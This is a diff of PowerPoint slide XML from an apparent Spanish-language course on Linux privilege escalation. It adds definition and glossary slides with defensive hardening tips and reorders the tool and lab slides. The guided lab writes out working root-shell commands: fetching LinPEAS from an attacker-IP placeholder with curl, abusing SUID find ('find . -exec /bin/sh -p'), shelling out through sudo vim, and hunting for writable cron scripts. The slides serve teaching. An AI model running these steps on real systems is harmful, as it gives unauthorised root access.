                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧰 Herramientas y preparación</a:t>
+              <a:t>📖 Definiciones y características</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4354,97 +4700,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Entorno de laboratorio: una VM Linux vulnerable (por ejemplo un target de VulnHub, HackTheBox o TryHackMe, o una VM propia deliberadamente mal configurada). Nunca se practica esto contra sistemas de terceros sin autorización.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  LinPEAS: script de la suite PEASS-ng. Descarga en la VM atacante y transfiere al objetivo vía python3 -m http.server + wget/curl.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  LinEnum: script Bash más ligero, útil cuando LinPEAS no puede ejecutarse (por ejemplo en sistemas muy antiguos).</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  pspy: permite observar procesos y cron jobs en ejecución sin privilegios de root, útil para inferir tareas programadas sin acceso a /etc/crontab.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  linux-exploit-suggester: script que compara la versión de kernel/paquetes contra una base de CVEs conocidos y sugiere exploits candidatos sin ejecutarlos automáticamente.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Snapshots de VM: antes de probar cualquier kernel exploit, toma un snapshot del estado actual; estos exploits son inestables y pueden colgar o corromper el sistema de laboratorio.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Acceso SSH o shell reversa ya establecida en el objetivo (asumimos que la clase 075 o equivalente ya cubrió el acceso inicial).</a:t>
+              <a:t>•  SUID (Set User ID): bit de permiso que hace que un binario se ejecute con los privilegios del propietario del archivo, no del usuario que lo invoca. Característica clave: un SUID root ejecutado sin…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enfoque defensivo: auditar periódicamente find / -perm -4000 y comparar contra una línea base conocida permite detectar SUID añadidos por un atacante como mecanismo de persistencia.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SGID (Set Group ID): análogo al SUID pero para el grupo propietario. Característica clave: útil cuando el objetivo es pertenecer a un grupo con acceso a recursos sensibles (por ejemplo, docker o…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enfoque defensivo: revisar membresías de grupos privilegiados (docker, disk, lxd) es tan importante como revisar SUID, porque otorgan escalada equivalente sin necesidad de un binario especial.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  GTFOBins: proyecto colaborativo que documenta binarios Unix legítimos (find, vim, less, awk, etc.) y cómo abusarlos para bypass de restricciones, lectura de archivos o escalada. Característica clave…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enfoque defensivo: el equipo azul puede usar GTFOBins como checklist para retirar SUID o reglas sudo innecesarias sobre binarios que aparecen en el catálogo.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Cron job: tarea programada por cron o crontab que se ejecuta con el UID configurado, frecuentemente root para tareas de mantenimiento. Característica clave: si el script apuntado es editable por el…</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4495,7 +4841,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>🧪 Laboratorio guiado</a:t>
+              <a:t>📔 Glosario</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4533,97 +4879,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Confirma el contexto de usuario y sistema: id, whoami, uname -a, cat /etc/os-release.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Transfiere LinPEAS al objetivo: en la atacante, python3 -m http.server 8000 dentro de la carpeta con linpeas.sh; en el objetivo, curl http://IPATACANTE:8000/linpeas.sh -o /tmp/linpeas.sh.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Ejecuta y guarda la salida: chmod +x /tmp/linpeas.sh &amp;&amp; /tmp/linpeas.sh -a | tee /tmp/salida.txt.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Revisa la sección de binarios SUID: find / -perm -4000 -type f 2&gt;/dev/null. Compara cada resultado contra GTFOBins (&lt;https://gtfobins.github.io&gt;) buscando la técnica "SUID".</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Si aparece, por ejemplo, find con SUID, explota con: find . -exec /bin/sh -p \; -quit.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Verifica reglas sudo: sudo -l. Si aparece una entrada como (root) NOPASSWD: /usr/bin/vim, consulta GTFOBins para la técnica "sudo" de vim y ejecuta sudo vim -c ':!/bin/sh'.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Inspecciona cron jobs: cat /etc/crontab, ls -la /etc/cron.d/, y busca scripts referenciados con permisos de escritura para tu usuario: find / -writable -type f 2&gt;/dev/null | grep -E 'cron|\.sh$'.</a:t>
+              <a:t>•  Término — Definición concisa</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Escalada de privilegios — Pasar de un usuario limitado a root</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Enumeración post-explotación — Inspeccionar el sistema en busca de vectores</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  LinPEAS / LinEnum — Scripts que automatizan la detección de vectores</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Bit SUID — El binario corre con los privilegios de su propietario</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  SGID — Equivalente al SUID para el grupo</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  GTFOBins — Catálogo de binarios legítimos abusables</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4674,7 +5020,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>✍️ Ejercicios</a:t>
+              <a:t>🧰 Herramientas y preparación</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4712,82 +5058,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Enumera manualmente (sin LinPEAS) los binarios SUID de tu VM de laboratorio y clasifica cuáles son explotables según GTFOBins.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Configura intencionalmente una entrada sudoers insegura (NOPASSWD: /usr/bin/find) y documenta el paso a paso de la escalada.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Crea un cron job de prueba que ejecute un script propiedad de tu usuario no privilegiado desde una tarea root, y explótalo.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Usa pspy64 para observar en tiempo real un cron job que se ejecuta cada minuto sin necesidad de leer /etc/crontab.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Investiga y documenta (sin explotar en producción) un CVE de kernel exploit relevante para una versión específica de Ubuntu o Debian.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Escribe un script de hardening que corrija automáticamente los tres vectores más comunes encontrados en el laboratorio.</a:t>
+              <a:t>•  Entorno de laboratorio: una VM Linux vulnerable (por ejemplo un target de VulnHub, HackTheBox o TryHackMe, o una VM propia deliberadamente mal configurada). Nunca se practica esto contra sistemas de…</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  LinPEAS: script de la suite PEASS-ng. Descarga en la VM atacante y transfiere al objetivo vía python3 -m http.server + wget/curl.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  LinEnum: script Bash más ligero, útil cuando LinPEAS no puede ejecutarse (por ejemplo en sistemas muy antiguos).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  pspy: permite observar procesos y cron jobs en ejecución sin privilegios de root, útil para inferir tareas programadas sin acceso a /etc/crontab.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  linux-exploit-suggester: script que compara la versión de kernel/paquetes contra una base de CVEs conocidos y sugiere exploits candidatos sin ejecutarlos automáticamente.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Snapshots de VM: antes de probar cualquier kernel exploit, toma un snapshot del estado actual; estos exploits son inestables y pueden colgar o corromper el sistema de laboratorio.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Acceso SSH o shell reversa ya establecida en el objetivo (asumimos que la clase 075 o equivalente ya cubrió el acceso inicial).</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4838,7 +5199,7 @@
                   <a:srgbClr val="0B3D2E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>📝 Reto verificable</a:t>
+              <a:t>🧪 Laboratorio guiado</a:t>
             </a:r>
           </a:p>
         </p:txBody>
@@ -4876,22 +5237,97 @@
                   <a:srgbClr val="22282E"/>
                 </a:solidFill>
               </a:rPr>
-              <a:t>•  Reto: en la VM de laboratorio asignada (con al menos tres vectores de escalada intencionalmente configurados: un SUID explotable, una regla sudo insegura y un cron job escribible), obtén una shell root usando cada uno de los tres caminos por separado.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr>
-              <a:spcAft>
-                <a:spcPts val="600"/>
-              </a:spcAft>
-            </a:pPr>
-            <a:r>
-              <a:rPr sz="1500">
-                <a:solidFill>
-                  <a:srgbClr val="22282E"/>
-                </a:solidFill>
-              </a:rPr>
-              <a:t>•  Criterio de aceptación: el alumno entrega capturas de id mostrando uid=0(root) para cada uno de los tres métodos, junto con el comando exacto usado y una explicación de la contramedida de hardening aplicable (por ejemplo, remover el bit SUID, corregir /etc/sudoers, o restringir permisos de escritura sobre scripts de cron).</a:t>
+              <a:t>•  Confirma el contexto de usuario y sistema: id, whoami, uname -a, cat /etc/os-release.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Transfiere LinPEAS al objetivo: en la atacante, python3 -m http.server 8000 dentro de la carpeta con linpeas.sh; en el objetivo, curl http://IPATACANTE:8000/linpeas.sh -o /tmp/linpeas.sh.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Ejecuta y guarda la salida: chmod +x /tmp/linpeas.sh &amp;&amp; /tmp/linpeas.sh -a | tee /tmp/salida.txt.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Revisa la sección de binarios SUID: find / -perm -4000 -type f 2&gt;/dev/null. Compara cada resultado contra GTFOBins (&lt;https://gtfobins.github.io&gt;) buscando la técnica "SUID".</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Si aparece, por ejemplo, find con SUID, explota con: find . -exec /bin/sh -p \; -quit.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Verifica reglas sudo: sudo -l. Si aparece una entrada como (root) NOPASSWD: /usr/bin/vim, consulta GTFOBins para la técnica "sudo" de vim y ejecuta sudo vim -c ':!/bin/sh'.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:spcAft>
+                <a:spcPts val="600"/>
+              </a:spcAft>
+            </a:pPr>
+            <a:r>
+              <a:rPr sz="1500">
+                <a:solidFill>
+                  <a:srgbClr val="22282E"/>
+                </a:solidFill>
+              </a:rPr>
+              <a:t>•  Inspecciona cron jobs: cat /etc/crontab, ls -la /etc/cron.d/, y busca scripts referenciados con permisos de escritura para tu usuario: find / -writable -type f 2&gt;/dev/null | grep -E 'cron|\.sh$'.</a:t>
             </a:r>
           </a:p>
         </p:txBody>
